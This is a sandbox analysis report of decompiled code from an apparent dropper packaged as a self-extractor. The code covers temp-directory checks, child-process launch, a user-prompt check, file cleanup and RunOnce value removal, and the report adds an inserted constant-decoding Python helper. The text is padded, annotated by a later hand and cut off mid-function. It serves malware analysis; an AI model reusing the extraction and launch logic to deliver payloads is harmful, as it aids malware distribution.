					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) { // INVALID_HANDLE_VALUE: directory not writable
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						// 0xffffffff = INVALID_FILE_ATTRIBUTES, 0x10 = FILE_ATTRIBUTE_DIRECTORY
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0x969124 = 0; // global error status: cleared on success
							_t14 = 1;
						}
					}
				} else {
					E009644B9(0, 0x4b5, 0, 0, 0x10, 0); // allocation failure: error-reporting helper
					L4:
					 *0x969124 = E00966285(); // global error status set from helper (likely the last error code)
					_t14 = 0;
				}
				return _t14; // 1 if the directory exists and is writable, else 0
			}
                                                                                                                                                                                                                                    0x0096597a
                                                                                                                                                                                                                                    0x0096597a
                                                                                                                                                                                                                                    0x0096596c
                                                                                                                                                                                                                                    0x009658f3
                                                                                                                                                                                                                                    0x00965901
                                                                                                                                                                                                                                    0x00965906
                                                                                                                                                                                                                                    0x0096590b
                                                                                                                                                                                                                                    0x00965910
                                                                                                                                                                                                                                    0x00965910
                                                                                                                                                                                                                                    0x00965918

APIs
• LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00965534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 009658E7
• CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00965534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00965943
• LocalFree.KERNEL32(00000000,?,00965534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0096594D
• CloseHandle.KERNEL32(00000000,?,00965534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0096595C
• GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00965534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00965963
Strings
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
• String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$TMP4351$.TMP
• API String ID: 747627703-188559970
• Opcode ID: 175e38c6ff3f03d66feb22e5e6d4228eeba55915a0d385c9e0e0ebc6591f8f30
• Instruction ID: fe42c8192252d91cf52d9d7275d68c2491f649702f510029b7148ddae626d57b
• Opcode Fuzzy Hash: 175e38c6ff3f03d66feb22e5e6d4228eeba55915a0d385c9e0e0ebc6591f8f30
• Instruction Fuzzy Hash: 91113471618220ABC7201F79AC0DB9B7E9DDF863B4F11061DF50AE32D1CEB08C45D6A0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 631 963fef-964010 632 964016-96403b CreateProcessA 631->632 633 96410a-96411a call 966ce0 631->633 634 9640c4-964101 call 966285 GetLastError FormatMessageA call 9644b9 632->634 635 964041-96406e WaitForSingleObject GetExitCodeProcess 632->635 647 964106 634->647 638 964070-964077 635->638 639 964091 call 96411b 635->639 638->639 642 964079-96407b 638->642 646 964096-9640b8 CloseHandle * 2 639->646 642->639 645 96407d-964089 642->645 645->639 648 96408b 645->648 649 9640ba-9640c0 646->649 650 964108 646->650 647->650 648->639 649->650 651 9640c2 649->651 650->633 651->647
C-Code - Quality: 84%
E00963FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
	signed int _v8;
	char _v524;
	long _v528;
	struct _PROCESS_INFORMATION _v544;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t20;
	void* _t22;
	int _t25;
	signed int _t34; // missing from the decompiler output; assigned below
	intOrPtr* _t39;
	signed int _t44;
	void* _t49;
	signed int _t50;
	intOrPtr _t53;

	_t45 = __edx;
	_t20 =  *0x968004; // 0xf4cc89a0 - /GS security cookie
	_v8 = _t20 ^ _t50;
	_t39 = __ecx;
	_t49 = 1;
	_t22 = 0;
	if(__ecx == 0) {
		L13:
		return E00966CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49); // cookie check, then return
	}
	asm("stosd"); // zero the 16-byte PROCESS_INFORMATION (_v544)
	asm("stosd");
	asm("stosd");
	asm("stosd");
	// 0x20 = NORMAL_PRIORITY_CLASS; __ecx is the command line, __edx the STARTUPINFOA
	_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
	if(_t25 == 0) {
		 *0x969124 = E00966285();
		// 0x1000 = FORMAT_MESSAGE_FROM_SYSTEM: render the launch error as text into _v524
		FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
		_t45 = 0x4c4;
		E009644B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
		L11:
		_t49 = 0;
		L12:
		_t22 = _t49;
		goto L13;
	}
	WaitForSingleObject(_v544.hProcess, 0xffffffff); // 0xffffffff = INFINITE: block until the child exits
	_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
	_t44 = _v528;
	_t53 =  *0x968a28; // 0x0
	if(_t53 == 0) {
		_t34 =  *0x969a2c; // 0x0
		if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
			_t34 = _t44 & 0xff000000;
			if((_t44 & 0xff000000) == 0xaa000000) {
				 *0x969a2c = _t44;
			}
		}
	}
	E0096411B(_t34, _t44);
	CloseHandle(_v544.hThread);
	CloseHandle(_v544.hProcess); // hProcess is the first member of PROCESS_INFORMATION
	if(( *0x969a34 & 0x00000400) == 0 || _v528 >= 0) {
		goto L12;
	} else {
		goto L11;
	}
}

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateProcessA.KERNELBASE ref: 00964033
                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00964049
                                                                                                                                                                                                                                    • GetExitCodeProcess.KERNELBASE ref: 0096405C
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0096409C
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 009640A8
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 009640DC
                                                                                                                                                                                                                                    • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 009640E9
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3183975587-0
                                                                                                                                                                                                                                    • Opcode ID: 8b92da13b9c914a12f4fa48cb932d453d538db40906f8c75d65ba15ddccb3e3e
                                                                                                                                                                                                                                    • Instruction ID: a3adff1334992a1a8a1294b14e48fd22c1374a89789ae8e8cbad8e08f5492e26
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b92da13b9c914a12f4fa48cb932d453d538db40906f8c75d65ba15ddccb3e3e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1531D131658218BBEB209FA5DC49FAB77BCEBA6710F1001ADF605E21A0CA704C85DF61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed

Basic blocks of E009651E5 (block id: address range, calls -> successor blocks), recovered from the graph rendering:
• 652: 9651e5-96520b, call 96468f, LocalAlloc -> 655, 656
• 655: 96522d-96523c, call 96468f -> 661, 662
• 656: 96520d-965228, call 9644b9, call 966285 -> 671
• 661: 965262-965270, lstrcmpA -> 665, 666
• 662: 96523e-965260, call 9644b9, LocalFree -> 671
• 665: 965272-965273, LocalFree -> 669
• 666: 96527e-96529c, call 9644b9, LocalFree -> 674, 675
• 669: 965279-96527c -> 672
• 671: 9652b0 -> 672
• 672: 9652b2-9652b5 (no successors)
• 674: 9652a6 -> 671
• 675: 96529e-9652a4 -> 669
C-Code - Quality: 100%
E009651E5(void* __eflags) {
    int _t5;
    void* _t6;
    void* _t28;
    /* _t1 and _t29 are used below but never declared: the decompiler did not
       recover them. Both carry the length of the "UPROMPT" string. */

    /* First call with a NULL buffer: returns the length of the "UPROMPT"
       string; +1 leaves room for the terminator. */
    _t1 = E0096468F("UPROMPT", 0, 0) + 1; // 0x1
    _t28 = LocalAlloc(0x40, _t1);          // 0x40 = LPTR (LMEM_FIXED | LMEM_ZEROINIT)
    if(_t28 != 0) {
        /* Second call copies the string into the freshly allocated buffer. */
        if(E0096468F("UPROMPT", _t28, _t29) != 0) {
            /* The literal "<None>" means "do not prompt": continue silently. */
            _t5 = lstrcmpA(_t28, "<None>"); // executed
            if(_t5 != 0) {
                /* Ask the user (presumably string id 0x3e9). The 0x20 and 4
                   arguments are consistent with MB_ICONQUESTION | MB_YESNO,
                   given that the result is compared with 6 (IDYES) below. */
                _t6 = E009644B9(0, 0x3e9, _t28, 0, 0x20, 4);
                LocalFree(_t28);
                if(_t6 != 6) {                  // 6 = IDYES
                    /* User declined: 0x800704c7 = HRESULT_FROM_WIN32(ERROR_CANCELLED). */
                     *0x969124 = 0x800704c7;
                    L10:
                    return 0;
                }
                 *0x969124 = 0;                  // S_OK
                L6:
                return 1;
            }
            LocalFree(_t28);
            goto L6;
        }
        /* String not found: error box (presumably string id 0x4b1, 0x10 = MB_ICONERROR),
           then 0x80070714 = HRESULT_FROM_WIN32(ERROR_RESOURCE_DATA_NOT_FOUND). */
        E009644B9(0, 0x4b1, 0, 0, 0x10, 0);
        LocalFree(_t28);
         *0x969124 = 0x80070714;
        goto L10;
    }
    /* Allocation failed: error box (presumably string id 0x4b5) and store
       whatever error value E00966285 returns. */
    E009644B9(0, 0x4b5, 0, 0, 0x10, 0);
     *0x969124 = E00966285();
    goto L10;
}
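The decompiled function above branches on a handful of raw Win32 constants: the HRESULTs 0x800704c7 and 0x80070714 stored at 0x969124, the message-box style bits 0x20|4 and 0x10, and the return value 6. The script below is an added triage helper, not code from the Joe Sandbox report or from the sample: it decodes those values from the documented HRESULT bit layout and HRESULT_FROM_WIN32 macro (winerror.h) and the MessageBox constants (winuser.h). The error-name table is deliberately limited to the two codes that occur on this page; reading the 0x20 and 4 arguments of E009644B9 as MessageBox style bits is an inference from the IDYES comparison, not something the report states.

```python
"""Decode the Win32 constants in the decompiled UPROMPT check.

Added triage helper, not part of the Joe Sandbox report or of the sample.
HRESULT layout: severity (bit 31), reserved (bits 27-30), facility
(bits 16-26), code (bits 0-15). HRESULT_FROM_WIN32 follows winerror.h.
"""

FACILITY_WIN32 = 7
S_OK = 0

# winerror.h names for the two Win32 codes stored by the decompiled function.
WIN32_ERROR_NAMES = {
    1223: "ERROR_CANCELLED",
    1812: "ERROR_RESOURCE_DATA_NOT_FOUND",
}

# winuser.h MessageBox styles: low nibble selects buttons, next nibble the icon.
MB_BUTTONS = {0: "MB_OK", 1: "MB_OKCANCEL", 2: "MB_ABORTRETRYIGNORE",
              3: "MB_YESNOCANCEL", 4: "MB_YESNO", 5: "MB_RETRYCANCEL"}
MB_ICONS = {0x10: "MB_ICONERROR", 0x20: "MB_ICONQUESTION",
            0x30: "MB_ICONWARNING", 0x40: "MB_ICONINFORMATION"}
# MessageBox return values.
MB_RESULTS = {1: "IDOK", 2: "IDCANCEL", 6: "IDYES", 7: "IDNO"}


def hresult_from_win32(code: int) -> int:
    """HRESULT_FROM_WIN32(x): non-positive values pass through, else tag with FACILITY_WIN32."""
    if code <= 0:
        return code & 0xFFFFFFFF
    return (code & 0xFFFF) | (FACILITY_WIN32 << 16) | 0x80000000


def decode_hresult(hr: int) -> dict:
    """Split an HRESULT into its fields and name the Win32 code where known."""
    hr &= 0xFFFFFFFF
    severity = hr >> 31
    facility = (hr >> 16) & 0x7FF
    code = hr & 0xFFFF
    if hr == S_OK:
        name = "S_OK"
    elif facility == FACILITY_WIN32:
        name = WIN32_ERROR_NAMES.get(code, "WIN32_ERROR_%d" % code)
    else:
        name = None
    return {"hresult": hr, "failed": bool(severity),
            "facility": facility, "code": code, "name": name}


def decode_mb_style(style: int) -> list:
    """Name the button group and icon bits of a MessageBox style word."""
    names = [MB_BUTTONS.get(style & 0xF, "MB_BUTTONS_%#x" % (style & 0xF))]
    icon = style & 0xF0
    if icon:
        names.append(MB_ICONS.get(icon, "MB_ICON_%#x" % icon))
    return names


def annotate_uprompt_check() -> dict:
    """Meaning of each value the function stores at 0x969124 or tests.

    Treating the 0x20 and 4 arguments of E009644B9 as MessageBox style bits
    is an inference from the comparison of its result with 6 (IDYES); the
    report does not name that function.
    """
    return {
        "user_declined": decode_hresult(0x800704C7)["name"],
        "string_missing": decode_hresult(0x80070714)["name"],
        "user_accepted": decode_hresult(0)["name"],
        "prompt_style": decode_mb_style(0x20 | 4),
        "error_box_style": decode_mb_style(0x10),
        "required_answer": MB_RESULTS[6],
    }


if __name__ == "__main__":
    for key, value in annotate_uprompt_check().items():
        print("%-16s %s" % (key, value))
```

The practical point for analysis: the only path that returns 1 without user interaction is the "<None>" case. If the "UPROMPT" string is anything else, execution stops at a Yes/No box and stores ERROR_CANCELLED unless the dialog is answered Yes, which is why an unattended sandbox run needs dialog auto-confirmation to get past this function.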
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009646A0
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: SizeofResource.KERNEL32(00000000,00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646A9
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009646C3
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: LoadResource.KERNEL32(00000000,00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646CC
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: LockResource.KERNEL32(00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646D3
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: memcpy_s.MSVCRT ref: 009646E5
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009646EF
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00962F4D,?,00000002,00000000), ref: 00965201
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00965250
                                                                                                                                                                                                                                      • Part of subcall function 009644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00964518
                                                                                                                                                                                                                                      • Part of subcall function 009644B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00964554
                                                                                                                                                                                                                                      • Part of subcall function 00966285: GetLastError.KERNEL32(00965BBC), ref: 00966285
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                    • String ID: <None>$UPROMPT
                                                                                                                                                                                                                                    • API String ID: 957408736-2980973527
                                                                                                                                                                                                                                    • Opcode ID: cb99202b7fe6766a4caed56266e13747f3bb80d73fb6654393c5ea77da38e132
                                                                                                                                                                                                                                    • Instruction ID: 16c9bb5e19f0e5781f92f85eb1b20e08027ce7b6e7903e9ebb607bf75dfec673
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb99202b7fe6766a4caed56266e13747f3bb80d73fb6654393c5ea77da38e132
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D811E7B1218601BFE3246BB15D5AF3B61DEDBCA388F12442DF752E6290DEBD8C016535
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                                                                                                    			E009652B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                                                    				signed int _t9;
                                                                                                                                                                                                                                    				signed int _t11;
                                                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                                                    				void* _t29;
                                                                                                                                                                                                                                    				CHAR** _t31;
                                                                                                                                                                                                                                    				void* _t32;
                                                                                                                                                                                                                                    				signed int _t33;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t28 = __edi;
                                                                                                                                                                                                                                    				_t22 = __ecx;
                                                                                                                                                                                                                                    				_t21 = __ebx;
                                                                                                                                                                                                                                    				_t9 =  *0x968004; // 0xf4cc89a0
                                                                                                                                                                                                                                    				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                                                    				_push(__esi);
                                                                                                                                                                                                                                    				_t31 =  *0x9691e0; // 0x31a8e18
                                                                                                                                                                                                                                    				if(_t31 != 0) {
                                                                                                                                                                                                                                    					_push(__edi);
                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                    						_t29 = _t31;
                                                                                                                                                                                                                                    						if( *0x968a24 == 0 &&  *0x969a30 == 0) {
                                                                                                                                                                                                                                    							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                                                    							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t31 = _t31[1];
                                                                                                                                                                                                                                    						LocalFree( *_t29);
                                                                                                                                                                                                                                    						LocalFree(_t29);
                                                                                                                                                                                                                                    					} while (_t31 != 0);
                                                                                                                                                                                                                                    					_pop(_t28);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t11 =  *0x968a20; // 0x0
                                                                                                                                                                                                                                    				_pop(_t32);
                                                                                                                                                                                                                                    				if(_t11 != 0 &&  *0x968a24 == 0 &&  *0x969a30 == 0) {
                                                                                                                                                                                                                                    					_push(_t22);
                                                                                                                                                                                                                                    					E00961781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                                                    					if(( *0x969a34 & 0x00000020) != 0) {
                                                                                                                                                                                                                                    						E009665E8( &_v268);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                                                    					_t22 =  &_v268;
                                                                                                                                                                                                                                    					E00962390( &_v268);
                                                                                                                                                                                                                                    					_t11 =  *0x968a20; // 0x0
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if( *0x969a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                                                    					_t11 = E00961FE1(_t22); // executed
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				 *0x968a20 =  *0x968a20 & 0x00000000;
                                                                                                                                                                                                                                    				return E00966CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                                                    			}

• Instruction addresses (one per line of the C-Code above, in order): 0x009652b6, 0x009652b6, 0x009652b6, 0x009652c1, 0x009652c8, 0x009652cb, 0x009652cc, 0x009652d4, 0x009652d6, 0x009652d7, 0x009652de, 0x009652e0, 0x009652f2, 0x009652fa, 0x009652fa, 0x00965302, 0x00965305, 0x0096530c, 0x00965312, 0x00965316, 0x00965316, 0x00965317, 0x0096531c, 0x0096531f, 0x00965333, 0x00965345, 0x00965351, 0x00965359, 0x00965359, 0x00965363, 0x00965369, 0x0096536f, 0x00965374, 0x00965374, 0x00965381, 0x00965387, 0x00965387
                                                                                                                                                                                                                                    0x0096538f
                                                                                                                                                                                                                                    0x009653a0

APIs
• SetFileAttributesA.KERNELBASE(031A8E18,00000080,?,00000000), ref: 009652F2
• DeleteFileA.KERNELBASE(031A8E18), ref: 009652FA
• LocalFree.KERNEL32(031A8E18,?,00000000), ref: 00965305
• LocalFree.KERNEL32(031A8E18), ref: 0096530C
• SetCurrentDirectoryA.KERNELBASE(009611FC,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00965363
Strings
• C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00965334
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
• String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
• API String ID: 2833751637-3290032183
• Opcode ID: 485bf3c1a7e51a672550f46e8bf3d4da4f4f63606e0df965828774247dd3cc68
• Instruction ID: af373c79a42ad08b4dfb081d223ad7c328f55a4c47cfae3d762b69a85a18c543
• Opcode Fuzzy Hash: 485bf3c1a7e51a672550f46e8bf3d4da4f4f63606e0df965828774247dd3cc68
• Instruction Fuzzy Hash: F621C331528604DFDB309F50DD19B6A77B8BB55B90F49025DE882A32A0DFF45C84EF40
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00961FE1(void* __ecx) {
	void* _v8;
	long _t4;

	if( *0x968530 != 0) {
		// Open the per-machine RunOnce key (0x80000002 = HKEY_LOCAL_MACHINE) with KEY_WRITE (0x20006)
		_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
		if(_t4 == 0) {
			// Remove the RunOnce cleanup entry that the self-extractor registered for its IXP002.TMP working directory
			RegDeleteValueA(_v8, "wextract_cleanup2"); // executed
			return RegCloseKey(_v8);
		}
	}
	return _t4;
}

APIs
• RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0096538C,?,?,0096538C), ref: 00962005
• RegDeleteValueA.KERNELBASE(0096538C,wextract_cleanup2,?,?,0096538C), ref: 00962017
• RegCloseKey.ADVAPI32(0096538C,?,?,0096538C), ref: 00962020
Strings
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: CloseDeleteOpenValue
• String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup2
• API String ID: 849931509-3354236729
• Opcode ID: 2d1894a4b6d69e8ec13d3a39a824d1f8051aad6fcedda472261469170007ea6c
• Instruction ID: d833a4698a1755d12791f7bcc948bca1fcae3c6b1a45bc26f3eacb67900615a2
• Opcode Fuzzy Hash: 2d1894a4b6d69e8ec13d3a39a824d1f8051aad6fcedda472261469170007ea6c
• Instruction Fuzzy Hash: D7E08630569319BBD7218F90EC0AF5A7B2DF741784F1002D9F905B0060EBB15E14FA05
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 94%
E00964CD0(char* __edx, long _a4, int _a8) {
	signed int _v8;
	char _v268;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t29;
	int _t30;
	long _t32;
	signed int _t33;
	long _t35;
	long _t36;
	struct HWND__* _t37;
	long _t38;
	long _t39;
	long _t41;
	long _t44;
	long _t45;
	long _t46;
	signed int _t50;
	long _t51;
	char* _t58;
	long _t59;
	char* _t63;
	long _t64;
	CHAR* _t71;
	CHAR* _t74;
	int _t75;
	signed int _t76;

	_t69 = __edx;
	_t29 =  *0x968004; // 0xf4cc89a0, the MSVC /GS stack cookie (__security_cookie)
	_t30 = _t29 ^ _t76; // cookie XOR frame pointer (_t76 is ebp in the original code)
	_v8 = _t30;
	_t75 = _a8;
	if( *0x9691d8 == 0) {
		_t32 = _a4;
		__eflags = _t32;
		if(_t32 == 0) {
			_t33 = E00964E99(_t75);
			L35:
			// E00966CE0 is the cookie check run before returning; _t54 and _t73 are left undefined by the decompiler
			return E00966CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
		}
		_t35 = _t32 - 1;
		__eflags = _t35;
		if(_t35 == 0) {
                                                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                                                    						_t33 = 0;
                                                                                                                                                                                                                                    						goto L35;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t36 = _t35 - 1;
                                                                                                                                                                                                                                    					__eflags = _t36;
                                                                                                                                                                                                                                    					if(_t36 == 0) {
                                                                                                                                                                                                                                    						_t37 =  *0x968584; // 0x0
                                                                                                                                                                                                                                    						__eflags = _t37;
                                                                                                                                                                                                                                    						if(_t37 != 0) {
                                                                                                                                                                                                                                    							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t54 = 0x9691e4;
                                                                                                                                                                                                                                    						_t58 = 0x9691e4;
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    							_t38 =  *_t58;
                                                                                                                                                                                                                                    							_t58 =  &(_t58[1]);
                                                                                                                                                                                                                                    							__eflags = _t38;
                                                                                                                                                                                                                                    						} while (_t38 != 0);
                                                                                                                                                                                                                                    						_t59 = _t58 - 0x9691e5;
                                                                                                                                                                                                                                    						__eflags = _t59;
                                                                                                                                                                                                                                    						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                                                    						_t73 =  &(_t71[1]);
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    							_t39 =  *_t71;
                                                                                                                                                                                                                                    							_t71 =  &(_t71[1]);
                                                                                                                                                                                                                                    							__eflags = _t39;
                                                                                                                                                                                                                                    						} while (_t39 != 0);
                                                                                                                                                                                                                                    						_t69 = _t71 - _t73;
                                                                                                                                                                                                                                    						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                                                    						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                    						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                    							L3:
                                                                                                                                                                                                                                    							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                                                    							goto L35;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t69 = 0x9691e4;
                                                                                                                                                                                                                                    						_t30 = E00964702( &_v268, 0x9691e4,  *(_t75 + 4));
                                                                                                                                                                                                                                    						__eflags = _t30;
                                                                                                                                                                                                                                    						if(__eflags == 0) {
